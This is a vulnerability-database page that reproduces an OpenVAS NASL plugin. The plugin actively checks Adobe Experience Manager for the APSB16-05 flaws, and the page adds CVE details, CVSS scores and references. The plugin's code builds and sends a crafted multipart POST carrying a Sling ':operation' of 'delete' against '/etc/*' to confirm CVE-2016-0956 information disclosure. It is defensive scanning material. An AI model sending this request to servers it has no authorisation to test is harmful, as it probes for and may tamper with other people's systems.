Adobe Experience Manager (AEM) Multiple Vulnerabilities (APSB16-05) - Active Check
🗓️ 11 Feb 2016 00:00:00Reported by Copyright (C) 2016 Greenbone AGType
openvas🔗 plugins.openvas.org👁 170 Views
| Reporter | Title | Published | Views | Family All 42 |
|---|---|---|---|---|
| Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure | 10 Feb 201600:00 | – | zdt | |
| Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 Multiple Vulnerabilities (APSB16-05) | 14 Sep 202300:00 | – | nessus | |
| CVE-2016-0955 | 7 May 202604:25 | – | circl | |
| CVE-2016-0956 | 10 Feb 201600:00 | – | circl | |
| CVE-2016-0957 | 3 Aug 202521:02 | – | circl | |
| CVE-2016-0958 | 6 Jan 202413:56 | – | circl | |
| Adobe Experience Manager Apache Sling Servlets Post Component Information Disclosure Vulnerability | 11 Feb 201600:00 | – | cnvd | |
| Adobe Experience Manager Cross-Site Scripting Vulnerability | 1 Apr 201600:00 | – | cnvd | |
| Unspecified Vulnerability in Adobe Experience Manager | 6 Apr 201600:00 | – | cnvd | |
| Adobe Experience Manager Dispatcher Security Bypass Vulnerability | 5 Apr 201600:00 | – | cnvd |
10
| Source | Link |
|---|---|
| helpx | www.helpx.adobe.com/security/products/experience-manager/apsb16-05.html |
| exploit-db | www.exploit-db.com/exploits/39435 |
| securityfocus | www.securityfocus.com/bid/83119 |
# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:adobe:experience_manager";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.807066");
script_version("2023-09-26T05:05:30+0000");
script_cve_id("CVE-2016-0955", "CVE-2016-0956", "CVE-2016-0957", "CVE-2016-0958");
script_tag(name:"cvss_base", value:"7.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:N/A:N");
script_tag(name:"last_modification", value:"2023-09-26 05:05:30 +0000 (Tue, 26 Sep 2023)");
script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2018-10-09 19:58:00 +0000 (Tue, 09 Oct 2018)");
script_tag(name:"creation_date", value:"2016-02-11 14:43:49 +0530 (Thu, 11 Feb 2016)");
script_name("Adobe Experience Manager (AEM) Multiple Vulnerabilities (APSB16-05) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2016 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_adobe_aem_http_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("adobe/aem/http/detected");
script_xref(name:"URL", value:"https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/39435");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/83119");
script_xref(name:"Advisory-ID", value:"APSB16-05");
script_tag(name:"summary", value:"Adobe Experience Manager (AEM) is prone to multiple
vulnerabilities.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request and checks the response if
the system is affected by CVE-2016-0956.");
script_tag(name:"insight", value:"The following flaws exist:
- CVE-2016-0955: Cross-site scripting (XSS) vulnerability
- CVE-2016-0956: Information disclosure in the Servlets Post component of Apache Sling as used in
AEM
- CVE-2016-0957: Dispatcher as used in AEM does not properly implement a URL filter
- CVE-2016-0958: Unspecified vulnerability related to a crafted serialized Java object");
script_tag(name:"impact", value:"- CVE-2016-0955: The flaw allows remote authenticated users to
inject arbitrary web script or HTML via a folder title field that is mishandled in the Deletion
popup dialog
- CVE-2016-0956: Successful exploitation will allow remote unauthenticated users to enumerate
local system files/folders that are not accessible publicly to unauthenticated users
- CVE-2016-0957: The flaw allows remote attackers to bypass dispatcher rules via unspecified
vectors
- CVE-2016-0958: Unspecified impact");
script_tag(name:"affected", value:"- CVE-2016-0955: AEM version 6.1.0
- CVE-2016-0956: Apache Sling Framework version 2.3.6 as used in AEM versions 5.6.1, 6.0.0 and
6.1.0
- CVE-2016-0957: Adobe Dispatcher before version 4.1.5 as used in AEM versions 5.6.1, 6.0.0 and
6.1.0
- CVE-2016-0958: AEM versions 5.6.1, 6.0.0 and 6.1.0");
script_tag(name:"solution", value:"Apply the hotfixes and updates described in the referenced
vendor advisory.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_vul");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if(!port = get_app_port(cpe:CPE, service:"www"))
exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
url = dir + "/libs/granite/core/content/login.html";
host = http_host_name(port:port);
data = string('--------------------------87cb9e2d2eed80d5\r\n',
'Content-Disposition: form-data; name=":operation"\r\n\r\n',
'delete\r\n',
'-------------------------87cb9e2d2eed80d5\r\n',
'Content-Disposition: form-data; name=":applyTo"\r\n\r\n',
'/etc/*\r\n',
'--------------------------87cb9e2d2eed80d5--\r\n');
req = string("POST ", url, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Content-Length: ", strlen(data), "\r\n",
"Content-Type: multipart/form-data; boundary=------------------------87cb9e2d2eed80d5\r\n",
"\r\n", data, "\r\n");
res = http_keepalive_send_recv(port:port, data:req);
if(res && 'id="ChangeLog' >< res && res =~ "^HTTP/1\.[01] 500") {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Sep 2023 00:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.8
CVSS 37.5
EPSS0.51989